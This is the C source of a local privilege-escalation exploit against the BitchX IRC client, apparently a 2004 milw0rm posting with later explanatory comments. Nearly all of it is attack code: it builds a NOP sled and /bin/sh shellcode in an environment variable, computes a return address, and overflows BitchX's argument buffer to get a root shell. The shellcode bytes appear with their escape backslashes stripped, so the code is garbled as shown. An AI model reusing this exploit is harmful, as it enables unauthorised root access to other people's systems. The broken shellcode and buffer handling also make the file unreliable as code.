// BitchX local-root by Sha0 (version 1.0c19 e inferiores -todas-)
// este exploit se lo dedico a mi chica.
// 0xC0000000-4-strlen(argv[1])-1-strlen(buffer)
// 2052 to the ret
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
// Global string handed to the executed program as an environment entry
// (see env[] in main); filled in by nopea() before execve() is called.
// Its strlen() also feeds the address arithmetic in main() (lret).
char payload[69];
// Byte string that nopea() copies into the tail of payload, right-aligned
// before payload's terminating NUL. nopea() uses strlen() on it, so only
// the characters up to the first NUL are copied.
char sha0code[] =
"xebx16x5bx31xc0"
"x50x53xb0x0bx89"
"xdbx89xe1x31xd2"
"xcdx80x31xc0x40"
"x31xdbxcdx80xe8"
"xe5xffxffxffx2f"
"x62x69x6ex2fx73x68";
void nopea (void);
int main (int argc, char **argv) {
/*
 * Entry point. argv[1] is the path of the program to run.
 * Builds a 2100-byte heap string used as the third argv entry of
 * "bash -c", an environment of "TERM=xterm" plus the global payload,
 * then calls execve() on argv[1].
 * Returns 1 on bad usage; on a successful execve() the function never
 * returns, and on failure it prints the error, frees the buffer and
 * returns 0.
 */
char *buff;
char *arg1="bash";
char *arg2="-c";
char *arg[]={arg1,arg2,buff,NULL}; // buff is still uninitialised here; slot 2 is reassigned below
char *env[]={"TERM=xterm",payload,NULL}; // payload is filled by nopea() before execve()
char offset[]=""; // unused
char sret[4]; // lret split into four little-endian bytes
unsigned long lret;
int i;
if (argc != 2) {
fprintf (stdout,"BitchX exploit Coded By Sha0n");
fprintf (stdout,"ej: %s /usr/bin/BitchXnn",argv[0]);
return (1);
}
buff = (char *)malloc (2100); // result is not checked for NULL before use
bzero (buff,sizeof(buff)); // sizeof(buff) is the size of a pointer, not 2100: only the first few bytes are zeroed
arg[2] = buff;
nopea ();
lret = 0xbffffffa - strlen(payload) - strlen(argv[1]); // constant minus both string lengths (formula in the file header comment)
sret[0] = (0x000000ff & lret); // least significant byte first
sret[1] = (0x0000ff00 & lret) >> 8;
sret[2] = (0x00ff0000 & lret) >> 16;
sret[3] = (0xff000000 & lret) >> 24;
for (i=0;i<2088;i+=4) // 2088, erring on the long side.
memcpy (buff+i,sret,4); // repeats sret over buff[0..2087]; buff[2088..2099] are never written, so no NUL terminator is guaranteed
execve (argv[1],arg,env); // replaces the process on success; the lines below run only on failure
perror ("execve()");
free (buff);
return (0);
}
void nopea (void) {
/*
 * Fills the global payload: clears it, sets every byte but the last to
 * 0x90, then places sha0code in the final strlen(sha0code) bytes before
 * the terminating NUL that bzero() left at payload[sizeof(payload)-1].
 * NOTE(review): if strlen(sha0code) > sizeof(payload)-1 the destination
 * pointer lands before the start of payload and memcpy() writes out of
 * bounds; nothing here checks that.
 */
bzero (payload,sizeof(payload)); // payload is an array, so all 69 bytes are cleared
memset (payload,0x90,sizeof(payload)-1); // keeps payload[68] as the NUL terminator
memcpy (payload+sizeof(payload)-strlen(sha0code)-1,sha0code,strlen(sha0code)); // right-aligned just before the terminator
}
// milw0rm.com [2004-10-20]